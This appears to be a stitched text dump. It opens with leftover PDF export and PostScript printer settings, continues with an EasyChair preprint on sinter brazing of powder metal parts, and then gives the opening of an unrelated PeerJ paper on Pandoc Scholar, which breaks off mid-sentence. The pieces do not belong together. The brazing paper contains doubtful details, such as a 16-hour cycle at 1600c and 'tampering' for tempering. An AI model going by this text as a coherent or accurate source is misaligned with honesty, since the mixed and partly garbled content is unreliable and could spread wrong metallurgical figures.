enterprises Introduction Literature review Materials and Methods Results and Discussion Conclusions flink6 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_ydypvtvejbby3ieiuc7quu6yge ---- EasyChair Preprint № 2020 A Study on the Sinter Brazing Joint of Powder Metal Components Pujan Tripathi and George Yang EasyChair preprints are intended for rapid dissemination of research results and are integrated with the rest of EasyChair. November 24, 2019 A Study on the Sinter Brazing Joint of Powder Metal Components Pujan Tripathi and George Yang Department of Engineering Technology Missouri Western State University 4525 Downs Drive St. Joseph, MO 64507, USA Abstract: The research focuses on the development of a new joint method, the sinter brazing of powder metal components. Various kinds of powder metallurgy composition were tested in the sinter brazing joint, mainly to study the operating conditions, strength of the joint. Although each of these processes brings about different results in metal, all of them involve three basic steps: heating, soaking, and cooling. Heat treatment such as heating, soaking, cooling, hardening, tampering has been investigated. Introduction: Powder metallurgy is a processing method where green parts are compacted using dies and get sintered. Sintering offers equivalent strength as a cast iron and superior design flexibility and produces Near-Net- Shaped (NNS) parts at lower costs and it reduces the need for the machining process. Now, sinter brazing is an established joining process for Powder Metal components, and it is often used in the production of automotive applications. A successfully brazed joint relies widely on the interaction between brazing alloy, the joining surfaces, and sintering atmosphere conditions. The purpose of testing brazing materials is to test the capabilities of the brazing filler materials in order to produce sinter brazed components, processed through sinter brazing to heat treatment with air quench and to compare different brazing pastes to determine their quality and strength to the powder metal components. Product designs within the powder metal industries utilize joining techniques to assemble a component from different compacted pieces. This enables PM industries to provide cost-effective complex parts for various applications compared to traditional fabrication practices. Sinter-brazing is one of the methods for joining the parts easily and efficiently. Brazing mechanism can be complex; however, it has the potential to reduce additional processing steps in a manufacturing scenario. The process can be achieved within one step instead of the traditional two steps. It also has economic advantages [1]. The metallic bond formed between parent mental surfaces has an adequate strength to achieve the high-performance standards according to the requirements. Interconnected porosity generates significant capillary forces that rapidly pull braze away from the connection interface. Moreover, the pore network becomes like a conduit that fills the bulk of the part with filler materials which results in a joint deficiency. Therefore, porosity is a considerable challenge in the sinter-brazing process. Using Copper (Cu) to infiltrate before brazing can be a potential solution to fill the pore network but is an expensive process. Another option is compressing to densities > 7. g/cm3 [4] but has a risk to get reduced strength than expected in the connection interface. Burgess Norton Mfg. Co. (Geneva Illinois) is making powder metal products since 1903 and operating seven facilities all over the world. 1000101-MPIF FLC:4405 is a widely used filler alloy for infiltration during the sinter-brazing process by Burgess Norton. This alloy limits the loss of material in the pore network and creates a strong bond between the parent metal surfaces. This can be achieved by increasing the liquid temperature to increase the surface tension, thus reducing the flowability to prevent braze alloy to penetrate further. However, the process is not entirely smooth and influenced by many external parameters. Despite having a high success ratio, it has occasional failure due to excessive infiltration. Significant work has been done to understand this challenge within manufacturing. One of the methods to counter excessive infiltration is to add some iron powder to the braze pre-mix to influence the onset of solidification temperature [5,6]. Brazing has many established best practices [1,6,7]. Performing each step of the sintering cycle within the controlled environment is one critical factor. To have an effective relubrication without shooting, a little oxidizing is required within the preheat zone. Although, some surface contaminants can negatively influence wetting and hinder braze from flowing through a gap. The excessive oxidizing atmosphere can cause inefficiency in reducing the brazing material, a greenish tint on the surface indicates excessive oxidation [1]. Also, furnace temperature should be adjusted for different loads. Furthermore, maintaining consistent temperature is essential to regulate desired brazing metal flow. Slow heating rates can segregate braze from ler melting constituents and alloy with an iron after re-solidification, impeding the remaining brazing metal from flowing into the pore network [2]. For successful brazing, wetting parent material surfacing with liquid braze is one of the key factors. It is important to dissolve the surface oxides by utilizing a flux on brazing and parental material to prevent braze to flow into the pore network within the joint [8]. However, in that process, glassy residues of metal oxides are left behind which can be adherent in nature. Thus, it is recommended to incorporate blind holes or enclosed cavities within the design. Regardless, if not performed in a vacuum chamber, adding flux is essential in the sinter-brazing process. Traditionally, sinter-brazing was performed with 1000101-MPIF FLC:4405 and sintering in a furnace cycle process. But to challenge the capabilities of sinter brazing materials and its components, another test took a place and the research done with the powder 1000111-MPIF FLC-4808 which showed the significant results in the sinter brazing procedure. Materials and Methods: The braze alloys that are used in the study are, Brazing powder 1000101-MPIF FLC:4405 and 1000111- MPIF FLC-4808. These are the two most used powder of Burgess Norton Mfg. Co. (Geneva Illinois). The sinter brazing paste is used SCM-Sinter Braze Grade:C-458 and SCM-Sinter Braze Grade: EXP6778-99. TYPE GRADE DESCRIPTION Pre-alloyed Steel FL-4405 Low alloy steel with pre alloyed manganese, molybdenum and nickel content for better hardenability. Hybrid-alloy Steel FLN2-4405, FLN4-4400, FLN4- 4405, FLN6-4405, FLNC-4405, Low alloy steel with pre alloyed molybdenum and admixed nickel and copper for better compressibility. Table:1 For the procedure weight of the powder used 18.5 to 20.00 grams. Selected TSI is 33 to 35. And the pressure used to test the shear strength is 39,197lbs to 43, 761lbs.for the testing density needed was 6.7 to 6.9 g/cm^3. Brazing slugs weighted length of 1.2mm, width 0.5mm and approximate Height of 0.2mm. Brazing material used a sinter brazing paste and in which the weight of the paste used around 0.15 to 0.20grams. Molybdenum- Nickel-Steel- pre alloyed- As sintered Table:2 Molybdenum-Nickel Steel – Pre-alloyed – Heat-treated Table:3 Reference: https://www.ssisintered.com/materials/low-alloy-molybdenum-nickel-steels.[10] Method: Make slugs of powder Brazing powder 1000101-MPIF FLC:4405 and 1000111-MPIF FLC-4808, the basic requirement for making slugs is to get a density of 6.7 to 6.9g/cm^3. Once the density and slugs are made use sinter brazing paste on both the different products. Once the brazing material is applied the brazed parts are ready for sintering. Sintering is effective when the process reduces the porosity and enhances properties such as strength, electrical conductivity, transparency and thermal conductivity; yet, in other cases, it may be useful to increase its strength but keep its gas absorbency constant as in filters or catalysts. During the firing process, atomic diffusion drives powder surface elimination in different stages, starting from the formation of necks between powders to the final elimination of small pores at the end of the process. In a furnace, test brazed parts are heated for 16 hours cycle and at 1600c temperature. Once the sintering is done slugs were being tested for the shear strength. Once the product is sintered then there are two possibilities for the heat treatment, there might be a chance that the product might get melt, or its bond gets stronger. But there are high chances that the product gets melted. After the sintering the https://www.ssisintered.com/materials/low-alloy-molybdenum-nickel-steels heat treatment took place, Heat treatment is any one of several controlled heating and cooling operations used to bring about the desired change in the physical properties of a metal. Its purpose is to improve the structural and physical properties for some particular use or for future work of the metal. There are five basic heat-treating processes: hardening, case hardening, annealing, normalizing, and tempering. Although each of these processes brings about different results in metal, all of them involve three basic steps: heating, soaking, and cooling. Heat treatment steps are as followed, heating, soaking, cooling, hardening, tampering. Following the heat treatment process was Air quenching carburizing process. Specification of this process, A Cycle – Air Cooled, Endo Gas Carburizing, Deep Freeze Tempering – 150°C – 230°C The following figure illustrates the method to use the Universal Tester machine to separate the two brazed components, to calculate shear strength. This device is measuring the rupture strength. Shear strength is calculated by the following procedure:  Drill a 0.25" (6.4mm) diameter hole by 0.125" (3.2mm) deep through the center of braze  Place a 0.25" Dowel pin in the hole and push down with tensile tester until part splits  Record reading = Breaking Load Results and conclusion: The research took place at Burgess Norton Mfg. [9]. Co. The test showed that the brazing paste SCM- Sinter Braze Grade: EXP6778-99 showed a significant increase in strength in comparison to the SCM-Sinter Braze Grade:C-458 paste. The EXP6778-99 paste was also not affected by the Heat Treat operation (typically weakens). This was a significant finding because no other sinter brazing process are currently Heat-Treating parts after they have been brazed due to the weakening of the bond. Powder 714080-99 RoHS Compliant EXP6778-99 1000101 2643.4 5018.3 1000101HT 2405.6 6230.5 1000111 3998.5 7118.6 Shear Strength (psi) Summary Reference: Burgess Norton Mfg. Co. [9] References: 1. Gabrielov, C. Wilson, and J. Hamill, “Sinter-Brazing Automotive Powertrain Components,” International Journal of Powder Metallurgy, Vol. 37, 7, 2001, pp 46-48. 2. M. Frank, “Advanced Sinter brazed P/M Subassemblies in Torque Transfer Systems: Reduction Hubs and Carriers,” SAE, 2002. 3. M. Onoda, R. Kameda, and T. Koiso, “Application of Sinter-Brazing,” Metal Powder Report, November 1983, pp 632 – 634. 4. P. Beiss, “Finishing processes in powder metallurgy,” Powder Metallurgy, 1989, 32, 4, pp 277-284. 5. M. Stromgren and O. Andersson, “Brazing of P/M Parts by Sintering,” Technical Report - PM 89-6. 6. W. Knopp, Brazing Alloy Composition, United States Patent 3,717,442 Feb. 20, 1973. 7. R. Peaslee, “How to Identify Brazing Failures,” Advanced Materials & Processes, December 2003, p 35. 8. AWS Committee, Brazing Manual, 1963, American Welding Society, New York, NY. 9. Burgess Norton Mfg. Co. 10. https://www.ssisintered.com/materials/low-alloy-molybdenum-nickel-steels. https://www.ssisintered.com/materials/low-alloy-molybdenum-nickel-steels work_yezbgqcljrdqjbrvjauzx4sxby ---- Submitted 19 December 2016 Accepted 3 April 2017 Published 8 May 2017 Corresponding author Robert Winkler, robert.winkler@cinvestav.mx Academic editor Sebastian Ventura Additional Information and Declarations can be found on page 20 DOI 10.7717/peerj-cs.112 Copyright 2017 Krewinkel and Winkler Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Formatting Open Science: agilely creating multiple document formats for academic manuscripts with Pandoc Scholar Albert Krewinkel1 and Robert Winkler2 1 Pandoc Development Team, Berlin, Germany 2 Department of Biotechnology and Biochemistry, CINVESTAV Unidad Irapuato, Mexico ABSTRACT The timely publication of scientific results is essential for dynamic advances in science. The ubiquitous availability of computers which are connected to a global network made the rapid and low-cost distribution of information through electronic channels possible. New concepts, such as Open Access publishing and preprint servers are currently changing the traditional print media business towards a community-driven peer production. However, the cost of scientific literature generation, which is either charged to readers, authors or sponsors, is still high. The main active participants in the authoring and evaluation of scientific manuscripts are volunteers, and the cost for online publishing infrastructure is close to negligible. A major time and cost factor is the formatting of manuscripts in the production stage. In this article we demonstrate the feasibility of writing scientific manuscripts in plain markdown (MD) text files, which can be easily converted into common publication formats, such as PDF, HTML or EPUB, using Pandoc. The simple syntax of Markdown assures the long-term readability of raw files and the development of software and workflows. We show the implementation of typical elements of scientific manuscripts—formulas, tables, code blocks and citations—and present tools for editing, collaborative writing and version control. We give an example on how to prepare a manuscript with distinct output formats, a DOCX file for submission to a journal, and a LATEX/PDF version for deposition as a PeerJ preprint. Further, we implemented new features for supporting ‘semantic web’ applications, such as the ‘journal article tag suite’— JATS, and the ‘citation typing ontology’—CiTO standard. Reducing the work spent on manuscript formatting translates directly to time and cost savings for writers, publishers, readers and sponsors. Therefore, the adoption of the MD format contributes to the agile production of open science literature. Pandoc Scholar is freely available from https://github.com/pandoc-scholar. Subjects Human–Computer Interaction, Computer Education, Computer Networks and Communications, Digital Libraries, World Wide Web and Web Science Keywords Open science, Markdown, Latex, Publishing, Typesetting, Document formats INTRODUCTION Agile development of science depends on the continuous exchange of information between researchers (Woelfle, Olliaro & Todd, 2011). In the past, physical copies of scientific works had to be produced and distributed. Therefore, publishers needed to invest considerable How to cite this article Krewinkel and Winkler (2017), Formatting Open Science: agilely creating multiple document formats for aca- demic manuscripts with Pandoc Scholar. PeerJ Comput. Sci. 3:e112; DOI 10.7717/peerj-cs.112 https://peerj.com mailto:robert.winkler@cinvestav.mx https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.112 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://github.com/pandoc-scholar http://dx.doi.org/10.7717/peerj-cs.112 resources for typesetting and printing. Since the journals were mainly financed by their subscribers, their editors not only had to decide on the scientific quality of a submitted manuscript, but also on the potential interest to their readers. The availability of globally connected computers enabled the rapid exchange of information at low cost. Yochai Benkler (2006) predicts important changes in the information production economy, which are based on three observations: 1. A nonmarket motivation in areas such as education, arts, science, politics and theology. 2. The actual rise of nonmarket production, made possible through networked individuals and coordinate effects. 3. The emergence of large-scale peer production; for example, of software and encyclopedias. Immaterial goods such as knowledge and culture are not lost when consumed or shared—they are ‘nonrival’—, and they enable a networked information economy, which is not commercially driven (Benkler, 2006). Preprints and e-prints In some areas of science a preprint culture, i.e., a paper-based exchange system of research ideas and results, already existed when Paul Ginsparg in 1991 initiated a server for the distribution of electronic preprints—‘e-prints’—about high-energy particle theory at the Los Alamos National Laboratory (LANL), USA (Ginsparg, 1994). Later, the LANL server moved with Ginsparg to Cornell University, USA, and was renamed as arXiv (Butler, 2001). Currently, arXiv (https://arxiv.org/) publishes e-prints related to physics, mathematics, computer science, quantitative biology, quantitative finance and statistics. Just a few years after the start of the first preprint servers, their important contribution to scientific communication was evident (Ginsparg, 1994; Youngen, 1998; Brown, 2001). In 2014, arXiv reached the impressive number of 1 million e-prints (Van Noorden, 2014). In more conservative areas, such as chemistry and biology, accepting the publishing prior peer-review took more time (Brown, 2003). A preprint server for life sciences (http://biorxiv.org/) was launched by the Cold Spring Habor Laboratory, USA, in 2013 (Callaway, 2013). PeerJ preprints (https://peerj.com/preprints/), started in the same year, accepts manuscripts from biological sciences, medical sciences, health sciences and computer sciences. The terms ‘preprints’ and ‘e-prints’ are used synonymously, since the physical distribution of preprints has become obsolete. A major drawback of preprint publishing are the sometimes restrictive policies of scientific publishers. The SHERPA/RoMEO project informs about copyright policies and self-archiving options of individual publishers (http://www.sherpa.ac.uk/romeo/). Open Access The term ‘Open Access’ (OA) was introduced 2002 by the Budapest Open Access Initiative and was defined as: ‘‘Barrier-free access to online works and other resources. OA literature is digital, online, free of charge (gratis OA), and free of needless copyright and licensing restrictions (libre OA).’’ (Suber, 2012) Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 2/23 https://peerj.com https://arxiv.org/ http://biorxiv.org/ https://peerj.com/preprints/ http://www.sherpa.ac.uk/romeo/ http://dx.doi.org/10.7717/peerj-cs.112 Frustrated by the difficulty to access even digitized scientific literature, three scientists founded the Public Library of Science (PLoS). In 2003, PLoS Biology was published as the first fully Open Access journal for biology (Brown, Eisen & Varmus, 2003; Eisen, 2003). Thanks to the great success of OA publishing, many conventional print publishers now offer a so-called ‘Open Access option’, i.e., to make accepted articles free to read for an addi- tional payment by the authors. The copyright in these hybrid models might remain with the publisher, whilst fully OA usually provide a liberal license, such as the Creative Commons Attribution 4.0 International (CC BY 4.0, https://creativecommons.org/licenses/by/4.0/). OA literature is only one component of a more general open philosophy, which also includes the access to scholarships, software, and data (Willinsky, 2005). Interestingly, there are several different ‘schools of thought’ on how to understand and define Open Science, as well the position that any science is open by definition, because of its objective to make generated knowledge public (Fecher & Friesike, 2014). Cost of journal article production In a recent study, the article processing charges (APCs) for research intensive universities in the USA and Canada were estimated to be about 1,800 USD for fully OA journals and 3,000 USD for hybrid OA journals (Solomon & Björk, 2016). PeerJ (https://peerj.com/), an OA journal for biological and computer sciences launched in 2013, drastically reduced the publishing cost, offering its members a life-time publishing plan for a small registration fee (Van Noorden, 2012); alternatively the authors can choose to pay an APC of $1,095 USD, which may be cheaper, if multiple co-authors participate. Examples such as the Journal of Statistical Software (JSS, https://www.jstatsoft.org/) and eLife (https://elifesciences.org/) demonstrate the possibility of completely community- supported OA publications. Figure 1 compares the APCs of different OA publishing business models. JSS and eLife are peer-reviewed and indexed by Thomson Reuters. Both journals are located in the Q1 quality quartile in all their registered subject categories of the Scimago Journal & Country Rank (http://www.scimagojr.com/), demonstrating that high-quality publications can be produced without charging the scientific authors or readers. In 2009, a study was carried out concerning the ‘‘Economic Implications of Alternative Scholarly Publishing Models’’, which demonstrates an overall societal benefit by using OA publishing models (Houghton et al., 2009). In the same report, the real publication costs are evaluated. The relative costs of an article for the publisher are presented in Fig. 2. Conventional publishers justify their high subscription or APC prices with the added value; for example, journalism (stated in the graphics as ‘non-article processing’). However, stakeholder profits, which could be as high as 50%, also must be considered, and are withdrawn from the science budget (Van Noorden, 2013). Generally, the production costs of an article could be roughly divided into commercial and academic/technical costs (Fig. 2). For nonmarket production, the commercial costs such as margins/profits, management etc. can be drastically reduced. Hardware and services for hosting an editorial system, such as Open Journal Systems of the Public Knowledge Project (https://pkp.sfu.ca/ojs/) can be provided by public institutions. Employed scholars Krewinkel and Winkler (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.112 3/23 https://peerj.com https://creativecommons.org/licenses/by/4.0/ https://peerj.com/ https://www.jstatsoft.org/ https://elifesciences.org/ http://www.scimagojr.com/ https://pkp.sfu.ca/ojs/ http://dx.doi.org/10.7717/peerj-cs.112 Figure 1 Article Processing Charge (APCs) that authors have to pay for with different Open Access (OA) publishing models. Data from Solomon & Björk (2016) and journal web-pages. Figure 2 Estimated publishing cost for a ‘hybrid’ journal (conventional with Open Access option). Data from Houghton et al. (2009). can perform editor and reviewer activities without additional cost for the journals. Nevertheless, 